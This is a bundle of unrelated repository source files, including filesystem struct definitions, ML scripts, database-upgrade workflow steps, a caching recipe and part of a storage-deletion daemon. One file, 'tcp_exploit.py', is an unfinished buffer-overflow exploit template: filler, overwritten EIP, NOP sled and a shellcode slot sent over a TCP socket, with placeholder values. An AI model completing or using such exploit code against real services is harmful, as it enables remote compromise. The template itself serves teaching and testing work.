UBIFS_NO_NODE_GROUP = 0 # This node is not part of a group
UBIFS_IN_NODE_GROUP = 1 # This node is part of a group
UBIFS_LAST_OF_NODE_GROUP = 2 # This node is the last in a group
# Superblock flags
UBIFS_FLG_BIGLPT = 2 # if 'big' LPT model is used if set.
UBIFS_FLG_SPACE_FIXUP = 4 # first-mount 'fixup' of free space within
# Struct defines
# Common header node
UBIFS_COMMON_HDR_FORMAT = '<IIQIBB2s'
UBIFS_COMMON_HDR_FIELDS = ['magic', # UBIFS node magic number.
'crc', # CRC32 checksum of header.
'sqnum', # Sequence number.
'len', # Full node length.
'node_type', # Node type.
'group_type',# Node group type.
'padding'] # Reserved for future, zeros.
UBIFS_COMMON_HDR_SZ = struct.calcsize(UBIFS_COMMON_HDR_FORMAT)
# LEBs needed.
# Key offset in key nodes
# out of place because of ordering issues.
UBIFS_KEY_OFFSET = UBIFS_COMMON_HDR_SZ
# Device node descriptor
UBIFS_DEV_DESC_FORMAT = '<IQ'
UBIFS_DEV_DESC_FIELDS = ['new', # New type device descriptor.
'huge'] # huge type device descriptor.
UBIFS_DEV_DESC_SZ = struct.calcsize(UBIFS_DEV_DESC_FORMAT)
# Inode node
UBIFS_INO_NODE_FORMAT = '<%ssQQQQQIIIIIIIIIII4sIH26s' % (UBIFS_MAX_KEY_LEN)
UBIFS_INO_NODE_FIELDS = ['key', # Node key
'creat_sqnum', # Sequence number at time of creation.
'size', # Inode size in bytes (uncompressed).
'atime_sec', # Access time in seconds.
'ctime_sec', # Creation time seconds.
'mtime_sec', # Modification time in seconds.
'atime_nsec', # Access time in nanoseconds.
'ctime_nsec', # Creation time in nanoseconds.
'mtime_nsec', # Modification time in nanoseconds.
'nlink', # Number of hard links.
'uid', # Owner ID.
'gid', # Group ID.
'mode', # Access flags.
'flags', # Per-inode flags.
'data_len', # Inode data length.
'xattr_cnt', # Count of extended attr this inode has
'xattr_size', # Summarized size of all extended
# attributes in bytes.
'padding1', # Reserved for future, zeros.
'xattr_names', # Sum of lengths of all extended.
# attribute names belonging to this
# inode.
'compr_type', # Compression type used for this inode.
'padding2'] # Reserved for future, zeros.
# 'data' No size
UBIFS_INO_NODE_SZ = struct.calcsize(UBIFS_INO_NODE_FORMAT)
# Directory entry node
UBIFS_DENT_NODE_FORMAT = '<%ssQBBH4s' % (UBIFS_MAX_KEY_LEN)
UBIFS_DENT_NODE_FIELDS = ['key', # Node key.
'inum', # Target inode number.
'padding1',# Reserved for future, zeros.
'type', # Type of target inode.
'nlen', # Name length.
'padding2']# Reserved for future, zeros.
# 'Name' No size
UBIFS_DENT_NODE_SZ = struct.calcsize(UBIFS_DENT_NODE_FORMAT)
# Data node
UBIFS_DATA_NODE_FORMAT = '<%ssIH2s' % (UBIFS_MAX_KEY_LEN)
UBIFS_DATA_NODE_FIELDS = ['key', # Node key.
'size', # Uncompressed data size.
'compr_type', # Compression type UBIFS_COMPR_*
'padding'] # Reserved for future, zeros.
# 'data' No size
UBIFS_DATA_NODE_SZ = struct.calcsize(UBIFS_DATA_NODE_FORMAT)
# Truncation node
UBIFS_TRUN_NODE_FORMAT = '<I12sQQ'
UBIFS_TRUN_NODE_FIELDS = ['inum', # Truncated inode number.
'padding', # Reserved for future, zeros.
'old_size', # size before truncation.
'new_size'] # Size after truncation.
UBIFS_TRUN_NODE_SZ = struct.calcsize(UBIFS_TRUN_NODE_FORMAT)
# Padding node
UBIFS_PAD_NODE_FORMAT = '<I'
UBIFS_PAD_NODE_FIELDS = ['pad_len'] # Number of bytes after this inode unused.
UBIFS_PAD_NODE_SZ = struct.calcsize(UBIFS_PAD_NODE_FORMAT)
# Superblock node
UBIFS_SB_NODE_FORMAT = '<2sBBIIIIIQIIIIIIIH2sIIQI16sI3968s'
UBIFS_SB_NODE_FIELDS = ['padding', # Reserved for future, zeros.
'key_hash', # Type of hash func used in keys.
'key_fmt', # Format of the key.
'flags', # File system flags.
'min_io_size', # Min I/O unit size.
'leb_size', # LEB size in bytes.
'leb_cnt', # LEB count used by FS.
'max_leb_cnt', # Max count of LEBS used by FS.
'max_bud_bytes', # Max amount of data stored in buds.
'log_lebs', # Log size in LEBs.
'lpt_lebs', # Number of LEBS used for lprops
# table.
'orph_lebs', # Number of LEBS used for
# recording orphans.
'jhead_cnt', # Count of journal heads
'fanout', # Tree fanout, max number of links
# per indexing node.
'lsave_cnt', # Number of LEB numbers in LPT's
# save table.
'fmt_version', # UBIFS on-flash format version.
'default_compr', # Default compression used.
'padding1', # Reserved for future, zeros.
'rp_uid', # Reserve pool UID
'rp_gid', # Reserve pool GID
'rp_size', # Reserve pool size in bytes
'time_gran', # Time granularity in nanoseconds.
'uuid', # UUID generated when the FS image
# was created.
'ro_compat_version',# UBIFS R/O Compatibility version.
'padding2'] #Reserved for future, zeros
UBIFS_SB_NODE_SZ = struct.calcsize(UBIFS_SB_NODE_FORMAT)
# Master node
UBIFS_MST_NODE_FORMAT = '<QQIIIIIIIIQQQQQQIIIIIIIIIIII344s'
UBIFS_MST_NODE_FIELDS = ['highest_inum',# Highest inode number in the
# committed index.
'cmt_no', # Commit Number.
'flags', # Various flags.
'log_lnum', # LEB num start of log.
'root_lnum', # LEB num of root indexing node.
'root_offs', # Offset within root_lnum
'root_len', # Root indexing node length.
'gc_lnum', # LEB reserved for garbage collection.
'ihead_lnum', # LEB num of index head.
'ihead_offs', # Offset of index head.
'index_size', # Size of index on flash.
'total_free', # Total free space in bytes.
'total_dirty', # Total dirty space in bytes.
'total_used', # Total used space in bytes (data LEBs)
'total_dead', # Total dead space in bytes (data LEBs)
'total_dark', # Total dark space in bytes (data LEBs)
'lpt_lnum', # LEB num of LPT root nnode.
'lpt_offs', # Offset of LPT root nnode.
'nhead_lnum', # LEB num of LPT head.
'nhead_offs', # Offset of LPT head.
'ltab_lnum', # LEB num of LPT's own lprop table.
'ltab_offs', # Offset of LPT's own lprop table.
'lsave_lnum', # LEB num of LPT's save table.
'lsave_offs', # Offset of LPT's save table.
'lscan_lnum', # LEB num of last LPT scan.
'empty_lebs', # Number of empty LEBs.
'idx_lebs', # Number of indexing LEBs.
'leb_cnt', # Count of LEBs used by FS.
'padding'] # Reserved for future, zeros.
UBIFS_MST_NODE_SZ = struct.calcsize(UBIFS_MST_NODE_FORMAT)
# LEB Reference node
UBIFS_REF_NODE_FORMAT = '<III28s'
UBIFS_REF_NODE_FIELDS = ['lnum', # Referred LEB number.
'offs', # Start offset of referred LEB.
'jhead', # Journal head number.
'padding'] # Reserved for future, zeros.
UBIFS_REF_NODE_SZ = struct.calcsize(UBIFS_REF_NODE_FORMAT)
# key/reference/length branch
UBIFS_BRANCH_FORMAT = '<III%ss' % (UBIFS_SK_LEN)
UBIFS_BRANCH_FIELDS = ['lnum', # LEB number of target node.
'offs', # Offset within lnum.
'len', # Target node length.
'key'] # Using UBIFS_SK_LEN as size.
UBIFS_BRANCH_SZ = struct.calcsize(UBIFS_BRANCH_FORMAT)
# Indexing node
UBIFS_IDX_NODE_FORMAT = '<HH'
UBIFS_IDX_NODE_FIELDS = ['child_cnt', # Number of child index nodes.
'level'] # Tree level.
# branches, no size.
UBIFS_IDX_NODE_SZ = struct.calcsize(UBIFS_IDX_NODE_FORMAT)
# File chunk size for reads.
FILE_CHUNK_SZ = 5 * 1024 *1024
|
scripts/03-predict.py
|
LaudateCorpus1/salgan
| 243 |
70522
|
<reponame>LaudateCorpus1/salgan
import os
import numpy as np
from tqdm import tqdm
import cv2
import glob
from utils import *
from constants import *
from models.model_bce import ModelBCE
def test(path_to_images, path_output_maps, model_to_test=None):
list_img_files = [k.split('/')[-1].split('.')[0] for k in glob.glob(os.path.join(path_to_images, '*'))]
# Load Data
list_img_files.sort()
for curr_file in tqdm(list_img_files, ncols=20):
print os.path.join(path_to_images, curr_file + '.jpg')
img = cv2.cvtColor(cv2.imread(os.path.join(path_to_images, curr_file + '.jpg'), cv2.IMREAD_COLOR), cv2.COLOR_BGR2RGB)
predict(model=model_to_test, image_stimuli=img, name=curr_file, path_output_maps=path_output_maps)
def main():
# Create network
model = ModelBCE(INPUT_SIZE[0], INPUT_SIZE[1], batch_size=8)
# Here need to specify the epoch of model sanpshot
load_weights(model.net['output'], path='gen_', epochtoload=90)
# Here need to specify the path to images and output path
test(path_to_images='../images/', path_output_maps='../saliency/', model_to_test=model)
if __name__ == "__main__":
main()
|
dbaas/workflow/steps/util/database_upgrade_patch.py
|
amintasvrp/database-as-a-service
| 303 |
70523
|
<reponame>amintasvrp/database-as-a-service<gh_stars>100-1000
# -*- coding: utf-8 -*-
from workflow.steps.util.base import BaseInstanceStep
import os
import logging
LOG = logging.getLogger(__name__)
class CantUpgradePatch(Exception):
pass
class DatabaseUpgradePatchStep(BaseInstanceStep):
def __init__(self, instance):
super(DatabaseUpgradePatchStep, self).__init__(instance)
upgrade = self.database.upgrades_patch.last()
if upgrade and upgrade.is_running:
self.target_patch = upgrade.target_patch
self.source_patch = upgrade.source_patch
else:
self.target_patch = self.infra.engine_patch
self.source_patch = self.engine.default_engine_patch
def __unicode__(self):
return "Changing database binaries..."
@property
def patch_path_by_os(self):
pp = self.target_patch.patch_path
if self.host.is_ol7:
pp = self.target_patch.patch_path_ol7 or pp
return pp
@property
def is_valid(self):
if self.source_patch == self.target_patch:
return False
if self.source_patch.engine != self.target_patch.engine:
error = "Can not change the Engine."
error += " Source engine={}, targe engine={}".format(
self.source_patch.engine,
self.target_patch.engine)
raise CantUpgradePatch(error)
if self.source_patch.patch_version > self.target_patch.patch_version:
error = "Target patch must be bigger than source patch."
error += " Source patch={}, targe patch={}".format(
self.source_patch, self.target_patch)
raise CantUpgradePatch(error)
if not self.patch_path_by_os:
error = "Patch path can not be empty."
raise CantUpgradePatch(error)
return True
def execute_script(self, script):
raise Exception(
"U must use the new method. run_script of HostSSH class"
)
output = {}
return_code = exec_remote_command_host(self.host, script, output)
if return_code != 0:
error = 'Could not execute script {}: {}'.format(
return_code, output)
raise EnvironmentError(error)
def undo(self):
pass
class MongoDBCHGBinStep(DatabaseUpgradePatchStep):
def do(self):
if not self.is_valid:
return
patch_path = self.patch_path_by_os
dir_name = os.path.splitext(os.path.basename(patch_path))[0]
if self.patch_path_by_os.startswith('https'):
download_script = 'curl {} | tar -xz'.format(patch_path)
else:
download_script = 'tar -xvf {}'.format(patch_path)
script = """cd /usr/local/
{download_script}
rm -f mongodb
ln -s {dir_name} mongodb
chown -R mongodb:mongodb mongodb/
""".format(download_script=download_script, dir_name=dir_name)
# self.execute_script(script)
self.host.ssh.run_script(script)
class MongoDBCHGBinStepRollback(MongoDBCHGBinStep):
def do(self):
pass
def undo(self):
super(MongoDBCHGBinStepRollback, self).do()
class RedisCHGBinStep(DatabaseUpgradePatchStep):
def do(self):
if not self.is_valid:
return
patch_path = self.patch_path_by_os
_, file_name = os.path.split(patch_path)
dir_name = file_name.rsplit('.', 2)[0]
if self.patch_path_by_os.startswith('https'):
download_script = 'curl {} | tar -xz'.format(patch_path)
else:
download_script = 'tar -xvf {}'.format(patch_path)
script = """cd /usr/local/
{download_script}
rm -f redis
ln -s {dir_name} redis
cd redis && make
wget -P /usr/local/redis/src/ https://artifactory.globoi.com/artifactory/generic-local/db/redis/redis-trib-gcom.rb
cd ..
chown -R redis:redis redis/
""".format(download_script=download_script, dir_name=dir_name)
# self.execute_script(script)
self.host.ssh.run_script(script)
class RedisCHGBinStepRollback(RedisCHGBinStep):
def do(self):
pass
def undo(self):
super(RedisCHGBinStepRollback, self).do()
class MySQLCHGBinStep(DatabaseUpgradePatchStep):
def do(self):
if not self.is_valid:
return
patch_path = self.patch_path_by_os
if self.patch_path_by_os.startswith('https'):
script = """
mkdir /tmp/mysql_patch/
wget -P /tmp/mysql_patch/ -r -nH --reject="index.html*" --no-parent --cut-dirs=8 {patch_path}
yum -y localinstall --nogpgcheck /tmp/mysql_patch/*.rpm
rm -rf /tmp/mysql_patch/
""".format(patch_path=patch_path)
else:
script = """cd {patch_path}
yum -y localinstall --nogpgcheck *.rpm
""".format(patch_path=patch_path)
# self.execute_script(script)
self.host.ssh.run_script(script)
class MySQLCHGBinStepRollback(MySQLCHGBinStep):
def do(self):
pass
def undo(self):
super(MySQLCHGBinStepRollback, self).do()
|
recipes/Python/498110_Memoize_decorator_O1_lengthlimited_LRU_cache/recipe-498110.py
|
tdiprima/code
| 2,023 |
70528
|
import cPickle
__all__ = ['memoize']
# This would usually be defined elsewhere
class decoratorargs(object):
def __new__(typ, *attr_args, **attr_kwargs):
def decorator(orig_func):
self = object.__new__(typ)
self.__init__(orig_func, *attr_args, **attr_kwargs)
return self
return decorator
class memoize(decoratorargs):
class Node:
__slots__ = ['key', 'value', 'older', 'newer']
def __init__(self, key, value, older=None, newer=None):
self.key = key
self.value = value
self.older = older
self.newer = newer
def __init__(self, func, capacity, keyfunc=lambda *args, **kwargs: cPickle.dumps((args, kwargs))):
self.func = func
self.capacity = capacity
self.keyfunc = keyfunc
self.reset()
def reset(self):
self.mru = self.Node(None, None)
self.mru.older = self.mru.newer = self.mru
self.nodes = {self.mru.key: self.mru}
self.count = 1
self.hits = 0
self.misses = 0
def __call__(self, *args, **kwargs):
key = self.keyfunc(*args, **kwargs)
try:
node = self.nodes[key]
except KeyError:
# We have an entry not in the cache
self.misses += 1
value = self.func(*args, **kwargs)
lru = self.mru.newer # Always true
# If we haven't reached capacity
if self.count < self.capacity:
# Put it between the MRU and LRU - it'll be the new MRU
node = self.Node(key, value, self.mru, lru)
self.mru.newer = node
lru.older = node
self.mru = node
self.count += 1
else:
# It's FULL! We'll make the LRU be the new MRU, but replace its
# value first
del self.nodes[lru.key] # This mapping is now invalid
lru.key = key
lru.value = value
self.mru = lru
# Add the new mapping
self.nodes[key] = self.mru
return value
# We have an entry in the cache
self.hits += 1
# If it's already the MRU, do nothing
if node is self.mru:
return node.value
lru = self.mru.newer # Always true
# If it's the LRU, update the MRU to be it
if node is lru:
self.mru = lru
return node.value
# Remove the node from the list
node.older.newer = node.newer
node.newer.older = node.older
# Put it between MRU and LRU
node.older = self.mru
self.mru.newer = node
node.newer = lru
lru.older = node
self.mru = node
return node.value
# Example usage - fib only needs a cache size of 3 to keep it from
# being an exponential-time algorithm
@memoize(3)
def fib(n): return (n > 1) and (fib(n - 1) + fib(n - 2)) or 1
fib(100) # => 573147844013817084101L
# This is faster because it doesn't use the default key function -
# it doesn't need to call cPickle.dumps((*args, **kwargs))
@memoize(100, lambda n: n)
def fib(n): return (n > 1) and (fib(n - 1) + fib(n - 2)) or 1
fib(100) # => 573147844013817084101L
# See what's in the cache
# => [(98, 218922995834555169026L), (99, 354224848179261915075L), (100, 573147844013817084101L)]
[(node.key, node.value) for node in fib.nodes.values()]
# Get an example of the key function working
fib.keyfunc(40) # => 40
# Simple report on performance
# => Hit %: 0.492462
print 'Hit %%: %f' % (float(fib.hits) / (fib.hits + fib.misses))
# Resize the LRU cache
fib.capacity = 100
fib.reset() # Not necessary unless you shrink it
|
Examples/Legacy/Ising1d/ising1d.py
|
gpescia/MyNetKet
| 352 |
70539
|
# Copyright 2020 The Netket Authors. - All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from netket import legacy as nk
# 1D Lattice
L = 20
g = nk.graph.Hypercube(length=L, n_dim=1, pbc=True)
# Hilbert space of spins on the graph
hi = nk.hilbert.Spin(s=1 / 2, N=g.n_nodes)
# Ising spin hamiltonian
ha = nk.operator.Ising(hilbert=hi, graph=g, h=1.0)
# RBM Spin Machine
ma = nk.nn.models.RBM(alpha=1)
# Metropolis Local Sampling
sa = nk.sampler.MetropolisLocal(hi, n_chains=32)
# Optimizer
op = nk.optim.GradientDescent(learning_rate=0.1)
# Create the optimization driver
vs = nk.variational_states.ClassicalVariationalState(
ma, sa, n_samples=1000, n_discard=100
)
gs = nk.Vmc(ha, op, variational_state=vs)
# Run the optimization for 300 iterations
gs.run(n_iter=2, out=None)
gs.run(n_iter=300, out=None)
|
tcp_exploit.py
|
sandlib/pythonpentest
| 174 |
70559
|
#!/us/bin/env python
'''
Author: <NAME>
Date: May 2015
Name: tcp_exploit.py
Purpose: An sample exploit for testing TCP services
Copyright (c) 2015, <NAME> All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys, socket, strut
rhost = ""
lhost = ""
rport =
fill ="A"*####
eip = struct.pack('<I',0x########)
offset = "\x90"*##
available_shellcode_space = ###
shell =() #Code to insert
# NOPs to fill the remaining space
exploit = fill + eip + offset + shell
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.sendto(exploit, (rhost, rport))
|
socfaker/__init__.py
|
priamai/soc-faker
| 122 |
70560
|
<reponame>priamai/soc-faker<gh_stars>100-1000
from .socfaker import SocFaker
|
scripts/execute_notebook.py
|
kyteinsky/OmniNet
| 525 |
70572
|
<reponame>kyteinsky/OmniNet
#!/usr/bin/env python
import glob
import os
if __name__ == '__main__':
print('Searching for notebooks in the notebooks directory')
# maybe executing like execute_notebook.py
notebook_dir = '../notebooks'
result_dir = '../results'
if not os.path.exists(notebook_dir):
# maybe executing like scripts/execute_notebook.py
notebook_dir = './notebooks'
result_dir = './results'
if not os.path.exists(notebook_dir):
# still did not find the notebook directory
print('Notebook Directory not found! Exiting')
exit(0)
# glob notebooks
notebooks = glob.glob(f'{notebook_dir}/*.ipynb')
# the length cannot be 0
if len(notebooks) == 0:
print('No Notebooks found! Exiting.')
exit(0)
print('Select a notebook to run. Results will be logged to <notebook_name>.log in the results directory\n')
for i in range(len(notebooks)):
print(f'{i + 1}. {os.path.basename(notebooks[i])}')
try:
option = int(input('\nEnter option: '))
if option > len(notebooks):
assert IndexError
print(f'Executing notebook {os.path.basename(notebooks[option - 1])}')
# deal with spaces in file names
selected_notebook = notebooks[option - 1].replace(' ', '\ ')
result_file_name = os.path.splitext(os.path.basename(selected_notebook))[0]
# run the selected notebook
os.system(f'jupyter nbconvert --to script --execute --stdout {selected_notebook} | '
f'python -u 2>&1 | tee {result_dir}/{result_file_name}.log &')
print('Process started!')
except IndexError as e:
print('Invalid option! Existing.')
exit(0)
|
code/vectormomentum/Code/Python/Libraries/__init__.py
|
ninamiolane/quicksilver
| 126 |
70582
|
<reponame>ninamiolane/quicksilver
#from CAvmHGMCommon import *
#from CAvmCommon import *
|
supervised/utils/learning_curves.py
|
stjordanis/mljar-supervised
| 1,882 |
70583
|
import os
import logging
import numpy as np
import pandas as pd
logger = logging.getLogger(__name__)
from supervised.utils.config import LOG_LEVEL
from supervised.utils.common import learner_name_to_fold_repeat
from supervised.utils.metric import Metric
logger.setLevel(LOG_LEVEL)
import matplotlib.pyplot as plt
import matplotlib.colors as mcolors
MY_COLORS = list(mcolors.TABLEAU_COLORS.values())
class LearningCurves:
output_file_name = "learning_curves.png"
@staticmethod
def single_iteration(learner_names, model_path):
for ln in learner_names:
df = pd.read_csv(
os.path.join(model_path, f"{ln}_training.log"),
names=["iteration", "train", "test"],
)
if df.shape[0] > 1:
return False
return True
@staticmethod
def plot(learner_names, metric_name, model_path, trees_in_iteration=None):
colors = MY_COLORS
if len(learner_names) > len(colors):
repeat_colors = int(np.ceil(len(learner_names) / len(colors)))
colors = colors * repeat_colors
if LearningCurves.single_iteration(learner_names, model_path):
LearningCurves.plot_single_iter(
learner_names, metric_name, model_path, colors
)
else:
LearningCurves.plot_iterations(
learner_names, metric_name, model_path, colors, trees_in_iteration
)
@staticmethod
def plot_single_iter(learner_names, metric_name, model_path, colors):
plt.figure(figsize=(10, 7))
for ln in learner_names:
df = pd.read_csv(
os.path.join(model_path, f"{ln}_training.log"),
names=["iteration", "train", "test"],
)
fold, repeat = learner_name_to_fold_repeat(ln)
repeat_str = f" Reapeat {repeat+1}," if repeat is not None else ""
plt.bar(
f"Fold {fold+1},{repeat_str} train",
df.train[0],
color="white",
edgecolor=colors[fold],
)
plt.bar(f"Fold {fold+1},{repeat_str} test", df.test[0], color=colors[fold])
plt.ylabel(metric_name)
plt.xticks(rotation=90)
plt.tight_layout(pad=2.0)
plot_path = os.path.join(model_path, LearningCurves.output_file_name)
plt.savefig(plot_path)
plt.close("all")
@staticmethod
def plot_iterations(
learner_names, metric_name, model_path, colors, trees_in_iteration=None
):
plt.figure(figsize=(10, 7))
for ln in learner_names:
df = pd.read_csv(
os.path.join(model_path, f"{ln}_training.log"),
names=["iteration", "train", "test"],
)
fold, repeat = learner_name_to_fold_repeat(ln)
repeat_str = f" Reapeat {repeat+1}," if repeat is not None else ""
# if trees_in_iteration is not None:
# df.iteration = df.iteration * trees_in_iteration
any_none = np.sum(pd.isnull(df.train))
if any_none == 0:
plt.plot(
df.iteration,
df.train,
"--",
color=colors[fold],
label=f"Fold {fold+1},{repeat_str} train",
)
any_none = np.sum(pd.isnull(df.test))
if any_none == 0:
plt.plot(
df.iteration,
df.test,
color=colors[fold],
label=f"Fold {fold+1},{repeat_str} test",
)
best_iter = None
if Metric.optimize_negative(metric_name):
best_iter = df.test.argmax()
else:
best_iter = df.test.argmin()
if best_iter is not None and best_iter != -1:
plt.axvline(best_iter, color=colors[fold], alpha=0.3)
if trees_in_iteration is not None:
plt.xlabel("#Trees")
else:
plt.xlabel("#Iteration")
plt.ylabel(metric_name)
# limit number of learners in the legend
# too many will raise warnings
if len(learner_names) <= 15:
plt.legend(loc="best")
plt.tight_layout(pad=2.0)
plot_path = os.path.join(model_path, LearningCurves.output_file_name)
plt.savefig(plot_path)
plt.close("all")
@staticmethod
def plot_for_ensemble(scores, metric_name, model_path):
plt.figure(figsize=(10, 7))
plt.plot(range(1, len(scores) + 1), scores, label=f"Ensemble")
plt.xlabel("#Iteration")
plt.ylabel(metric_name)
plt.legend(loc="best")
plot_path = os.path.join(model_path, LearningCurves.output_file_name)
plt.savefig(plot_path)
plt.close("all")
|
lib/rucio/daemons/reaper/dark_reaper.py
|
jamesp-epcc/rucio
| 187 |
70607
|
# -*- coding: utf-8 -*-
# Copyright 2016-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - <NAME> <<EMAIL>>, 2016-2018
# - <NAME> <<EMAIL>>, 2016-2021
# - <NAME> <<EMAIL>>, 2016-2021
# - <NAME> <<EMAIL>>, 2018-2019
# - <NAME> <<EMAIL>>, 2019
# - <NAME> <<EMAIL>>, 2020
# - <NAME> <<EMAIL>>, 2019
# - <NAME> <<EMAIL>>, 2020
# - <NAME> <<EMAIL>>, 2020
# - <NAME> <<EMAIL>>, 2020-2021
# - <NAME> <<EMAIL>>, 2021
# - <NAME> <<EMAIL>>, 2021
'''
Dark Reaper is a daemon to manage quarantined file deletion.
'''
import hashlib
import logging
import os
import random
import socket
import sys
import threading
import time
import traceback
import rucio.db.sqla.util
from rucio.common import exception
from rucio.common.config import config_get_bool
from rucio.common.exception import (SourceNotFound, DatabaseException, ServiceUnavailable,
RSEAccessDenied, ResourceTemporaryUnavailable,
RSENotFound, VONotFound)
from rucio.common.logging import setup_logging
from rucio.common.utils import daemon_sleep
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.message import add_message
from rucio.core.quarantined_replica import (list_quarantined_replicas,
delete_quarantined_replicas,
list_rses)
import rucio.core.rse as rse_core
from rucio.core.rse_expression_parser import parse_expression
from rucio.core.vo import list_vos
from rucio.rse import rsemanager as rsemgr
logging.getLogger("requests").setLevel(logging.CRITICAL)
GRACEFUL_STOP = threading.Event()
def reaper(rses, worker_number=0, total_workers=1, chunk_size=100, once=False, scheme=None, sleep_time=60):
"""
Main loop to select and delete files.
:param rses: List of RSEs the reaper should work against.
:param worker_number: The worker number.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
:param once: If True, only runs one iteration of the main loop.
:param scheme: Force the reaper to use a particular protocol, e.g., mock.
:param sleep_time: Thread sleep time after each chunk of work.
"""
logging.info('Starting Dark Reaper %s-%s: Will work on RSEs: %s', worker_number, total_workers, ', '.join(rses))
pid = os.getpid()
thread = threading.current_thread()
hostname = socket.gethostname()
executable = ' '.join(sys.argv)
hash_executable = hashlib.sha256((sys.argv[0] + ''.join(rses)).encode()).hexdigest()
sanity_check(executable=None, hostname=hostname)
while not GRACEFUL_STOP.is_set():
try:
# heartbeat
heartbeat = live(executable=executable, hostname=hostname, pid=pid, thread=thread,
hash_executable=hash_executable)
logging.info('Dark Reaper({0[worker_number]}/{0[total_workers]}): Live gives {0[heartbeat]}'
.format(locals()))
nothing_to_do = True
start_time = time.time()
rses_to_process = list(set(rses) & set(list_rses()))
random.shuffle(rses_to_process)
for rse_id in rses_to_process:
replicas = list_quarantined_replicas(rse_id=rse_id,
limit=chunk_size, worker_number=worker_number,
total_workers=total_workers)
rse_info = rsemgr.get_rse_info(rse_id=rse_id)
rse = rse_info['rse']
prot = rsemgr.create_protocol(rse_info, 'delete', scheme=scheme)
deleted_replicas = []
try:
prot.connect()
for replica in replicas:
nothing_to_do = False
scope = ''
if replica['scope']:
scope = replica['scope'].external
try:
pfn = str(list(rsemgr.lfns2pfns(rse_settings=rse_info,
lfns=[{'scope': scope,
'name': replica['name'],
'path': replica['path']}],
operation='delete',
scheme=scheme).values())[0])
logging.info('Dark Reaper %s-%s: Deletion ATTEMPT of %s:%s as %s on %s',
worker_number, total_workers, scope, replica['name'], pfn, rse)
start = time.time()
prot.delete(pfn)
duration = time.time() - start
logging.info('Dark Reaper %s-%s: Deletion SUCCESS of %s:%s as %s on %s in %s seconds',
worker_number, total_workers, scope, replica['name'], pfn, rse, duration)
payload = {'scope': scope,
'name': replica['name'],
'rse': rse,
'rse_id': rse_id,
'file-size': replica.get('bytes') or 0,
'bytes': replica.get('bytes') or 0,
'url': pfn,
'duration': duration,
'protocol': prot.attributes['scheme']}
if replica['scope'].vo != 'def':
payload['vo'] = replica['scope'].vo
add_message('deletion-done', payload)
deleted_replicas.append(replica)
except SourceNotFound:
err_msg = ('Dark Reaper %s-%s: Deletion NOTFOUND of %s:%s as %s on %s'
% (worker_number, total_workers, scope, replica['name'], pfn, rse))
logging.warning(err_msg)
deleted_replicas.append(replica)
except (ServiceUnavailable, RSEAccessDenied, ResourceTemporaryUnavailable) as error:
err_msg = ('Dark Reaper %s-%s: Deletion NOACCESS of %s:%s as %s on %s: %s'
% (worker_number, total_workers, scope, replica['name'], pfn, rse, str(error)))
logging.warning(err_msg)
payload = {'scope': scope,
'name': replica['name'],
'rse': rse,
'rse_id': rse_id,
'file-size': replica['bytes'] or 0,
'bytes': replica['bytes'] or 0,
'url': pfn,
'reason': str(error),
'protocol': prot.attributes['scheme']}
if replica['scope'].vo != 'def':
payload['vo'] = replica['scope'].vo
add_message('deletion-failed', payload)
except Exception:
logging.critical(traceback.format_exc())
finally:
prot.close()
delete_quarantined_replicas(rse_id=rse_id, replicas=deleted_replicas)
if once:
break
if once:
break
if nothing_to_do:
logging.info('Dark Reaper %s-%s: Nothing to do', worker_number, total_workers)
daemon_sleep(start_time=start_time, sleep_time=sleep_time, graceful_stop=GRACEFUL_STOP)
except DatabaseException as error:
logging.warning('Reaper: %s', str(error))
except Exception:
logging.critical(traceback.format_exc())
die(executable=executable, hostname=hostname, pid=pid, thread=thread, hash_executable=hash_executable)
logging.info('Graceful stop requested')
logging.info('Graceful stop done')
return
def stop(signum=None, frame=None):
"""
Graceful exit.
"""
GRACEFUL_STOP.set()
def run(total_workers=1, chunk_size=100, once=False, rses=[], scheme=None,
exclude_rses=None, include_rses=None, vos=None, delay_seconds=0, sleep_time=60):
"""
Starts up the reaper threads.
:param total_workers: The total number of workers.
:param chunk_size: the size of chunk for deletion.
:param once: If True, only runs one iteration of the main loop.
:param rses: List of RSEs the reaper should work against. If empty, it considers all RSEs (Single-VO only).
:param scheme: Force the reaper to use a particular protocol/scheme, e.g., mock.
